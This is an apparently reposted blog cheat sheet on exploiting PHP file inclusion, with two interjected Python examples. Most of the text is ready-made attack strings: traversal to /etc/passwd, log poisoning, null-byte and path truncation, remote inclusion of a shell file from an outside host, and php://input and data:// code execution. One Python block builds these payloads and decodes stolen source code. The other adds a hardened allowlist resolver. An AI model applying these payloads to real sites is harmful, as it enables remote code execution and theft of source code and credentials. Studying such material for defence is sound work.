
Exploiting PHP File Inclusion – Overview

To see the exploitation technique in more detail, refer to the source.

Recently I have seen a lot of questions regarding PHP file inclusions and the possibilities they offer, so I decided to give a small overview. All the tricks have been described in detail elsewhere before, but I like having them summed up in one place.

Basic Local File Inclusion:

  <?php include("inc/" . $_GET['file']); ?>

  • Including files in the same directory:
    ?file=.htaccess
  • Path Traversal:
    ?file=../../../../../../../../../var/lib/locate.db
    (this file is interesting because it lets you search the filesystem for other files worth including)
  • Including injected PHP code:
    ?file=../../../../../../../../../var/log/apache/error.log
    (PHP code planted in the log, e.g. by requesting a URL that contains it, is evaluated when the log is included)

Limited Local File Inclusion:

  <?php include("inc/" . $_GET['file'] . ".htm"); ?>

  • Null Byte Injection:
    ?file=../../../../../../../../../etc/passwd%00
    (requires magic_quotes_gpc=off and PHP before 5.3.4; the NUL byte ends the path, so the appended ".htm" is dropped)
  • Directory Listing with Null Byte Injection:
    ?file=../../../../../../../../../var/www/accounts/%00
    (UFS filesystem only, requires magic_quotes_gpc=off)
  • Path Truncation:
    ?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
    (the path is padded past the maximum path length, so the appended suffix is cut off)
  • Dot Truncation:
    ?file=../../../../../../../../../etc/passwd……………. …
    (Windows only, which strips trailing dots from file names)
  • Reverse Path Truncation:
    ?file=../../../../ [...] ../../../../../etc/passwd
    (the padding is put in front, as a long run of "../", instead of behind the file name)
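The following is an added example and not code from the original post: a small Python model of how the two includes above resolve the "file" parameter, showing why the traversal and null-byte payloads work and why the ".htm" suffix alone does not stop them, next to a hardened resolver that refuses all of them. The document root /var/www, the allowlist of fragment names and the sample parameters are assumptions made for illustration.

```python
# Added example (not code from the original post): models how the two
# vulnerable includes above resolve the "file" parameter, and shows a hardened
# resolver that refuses every trick in the list. The document root /var/www,
# the allowlist and the sample parameters are assumptions for illustration.
import posixpath
from urllib.parse import unquote

WEBROOT = "/var/www"                        # assumed document root
INC_DIR = posixpath.join(WEBROOT, "inc")    # the "inc/" prefix from the snippets


def vulnerable_resolve(param, suffix="", php_before_5_3_4=True):
    """Path that include("inc/" . $_GET['file'] . suffix) actually opens.

    Two behaviours the tricks depend on are emulated:
      * "../" is honoured because the input is plain string concatenation,
        so the path walk climbs out of inc/ (extra ".." past the root are
        ignored, which is why the payloads use more of them than needed);
      * with magic_quotes_gpc=off, %00 decodes to a NUL byte; PHP before
        5.3.4 handed the string to the C library, which stops at the NUL,
        so an appended ".htm" is silently dropped. Newer PHP refuses the
        path outright, modelled here as None.
    """
    raw = unquote(param) + suffix
    if "\x00" in raw:
        if not php_before_5_3_4:
            return None
        raw = raw.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(INC_DIR, raw))


ALLOWED_PAGES = {"header", "footer", "menu"}   # assumed set of includable fragments


def safe_resolve(param, suffix=".htm"):
    """Hardened replacement: an allowlist of fragment names decides, and a
    containment check on the final path is kept as defence in depth for the
    day someone extends the allowlist carelessly. Returns None to refuse."""
    name = unquote(param)
    if "\x00" in name or name not in ALLOWED_PAGES:
        return None
    candidate = posixpath.normpath(posixpath.join(INC_DIR, name + suffix))
    # commonpath, not startswith: "/var/www/inc2/x" must not count as inside inc/
    if posixpath.commonpath([INC_DIR, candidate]) != INC_DIR:
        return None
    return candidate


if __name__ == "__main__":
    traversal = "../../../../../../../../../etc/passwd"
    print(vulnerable_resolve(".htaccess"))                       # /var/www/inc/.htaccess
    print(vulnerable_resolve(traversal, ".htm"))                 # /etc/passwd.htm (suffix blocks it)
    print(vulnerable_resolve(traversal + "%00", ".htm"))         # /etc/passwd (NUL drops the suffix)
    print(vulnerable_resolve(traversal + "%00", ".htm", False))  # None (PHP >= 5.3.4)
    print(safe_resolve("header"), safe_resolve(traversal + "%00"))  # /var/www/inc/header.htm None
```

The allowlist is what actually fixes the bug; the commonpath check only exists so that a later mistake in the allowlist cannot reopen traversal. A realpath-style containment check on its own would still be fooled by the null byte on old PHP, because realpath() truncates at the NUL too.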
Basic Remote File Inclusion:

  <?php include($_GET['file']); ?>

  • Including Remote Code:
    ?file=[http|https|ftp]://websec.wordpress.com/shell.txt
    (requires allow_url_fopen=On and allow_url_include=On)
  • Using the PHP stream php://input:
    ?file=php://input
    (put your payload in the POST body, watch the URL encoding; requires allow_url_include=On)
  • Using the PHP stream php://filter:
    ?file=php://filter/convert.base64-encode/resource=index.php
    (lets you read PHP source: the file comes back base64-encoded, so it isn't evaluated; php://filter is a local wrapper, so it needs neither allow_url_fopen nor allow_url_include)
  • Using data URIs:
    ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
    (requires allow_url_include=On; the example decodes to "I love PHP")
  • Using XSS:
    ?file=http://127.0.0.1/path/xss.php?xss=phpcode
    (a page on the same host that reflects a parameter unescaped echoes your PHP code into the included content; makes sense if outbound connections are firewalled or only whitelisted domains are allowed)
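The following is an added example, not code from the original post or from the websec blog: Python helpers that build the php://filter and data:// values for the ?file= parameter listed above and decode what the php://filter trick returns, including the percent-encoding of the base64 blob that the "watch urlencoding" remark is about. The sample response body, its HTML wrapper and the file names are constructed for illustration.

```python
# Added example (not code from the original post): builds the php://filter and
# data:// values for the ?file= parameter described above and decodes what the
# php://filter trick returns. The sample response body is constructed here for
# illustration; the HTML around the blob stands in for whatever the vulnerable
# page normally renders around the included file.
import base64
import re
from urllib.parse import quote


def filter_payload(resource):
    """?file= value that makes include() emit the file base64-encoded instead
    of executing it. php://filter is a local wrapper, so this needs neither
    allow_url_fopen nor allow_url_include."""
    return "php://filter/convert.base64-encode/resource=" + resource


def decode_filter_response(body):
    """Recover the source from the page that wrapped the include's output.

    The encoded file is the longest run of base64 characters in the body;
    markup around it never forms a run that long, so no knowledge of the
    page template is needed. Returns None when no blob is present."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        return None
    blob = max(runs, key=len)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def data_payload(php_code):
    """?file= value using the data:// wrapper (needs allow_url_include=On).

    base64 output may contain '+', '/' and '='; in a query string '+' decodes
    to a space and would corrupt the blob, so everything is percent-encoded."""
    blob = base64.b64encode(php_code.encode()).decode()
    return "data://text/plain;base64," + quote(blob, safe="")


# Constructed sample: what the target would send back for
# ?file=php://filter/convert.base64-encode/resource=config.php
SAMPLE_SOURCE = '<?php $db_pass = "s3cr3t"; ?>'
SAMPLE_RESPONSE = (
    '<html><body><div id="main">'
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "</div></body></html>"
)

if __name__ == "__main__":
    print(filter_payload("config.php"))
    print(decode_filter_response(SAMPLE_RESPONSE))
    print(data_payload("<?php phpinfo(); ?>"))
```

The decoder picks the longest base64 run rather than parsing the template, so the same helper works across different target pages; if the included file is very small, lower the minimum run length in the regular expression.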
Limited Remote File Inclusion:

  <?php include($_GET['file'] . ".htm"); ?>

  • ?file=http://websec.wordpress.com/shell
    (serve the payload as shell.htm so the appended suffix matches)
  • ?file=http://websec.wordpress.com/shell.txt?
    (the suffix ends up in the query string)
  • ?file=http://websec.wordpress.com/shell.txt%23
    (the suffix ends up in the URL fragment)
    (these require allow_url_fopen=On and allow_url_include=On)
  • ?file=\\evilshare\shell.php
    (Windows: a UNC path is opened as a plain file, so it works with allow_url_fopen=Off)

Static Remote File Inclusion:

  • Man In The Middle
    (when the code includes a fixed remote URL over plain HTTP, whoever can redirect or intercept that request serves their own file; lame indeed, but often forgotten)

Filter evasion:

  • Access files with wildcards

Of course you can combine all the tricks. If you are aware of any other tricks or interesting files to include, please leave a comment and I'll add them.
Source: http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

Links of interest:

http://projects.webappsec.org/w/page/13246949/Null%20Byte%20Injection
http://www.theprohack.com/2009/07/null-byte-hack.html
http://hakipedia.com/index.php/Poison_Null_Byte
https://www.owasp.org/index.php/Unrestricted_File_Upload (comprehensive)

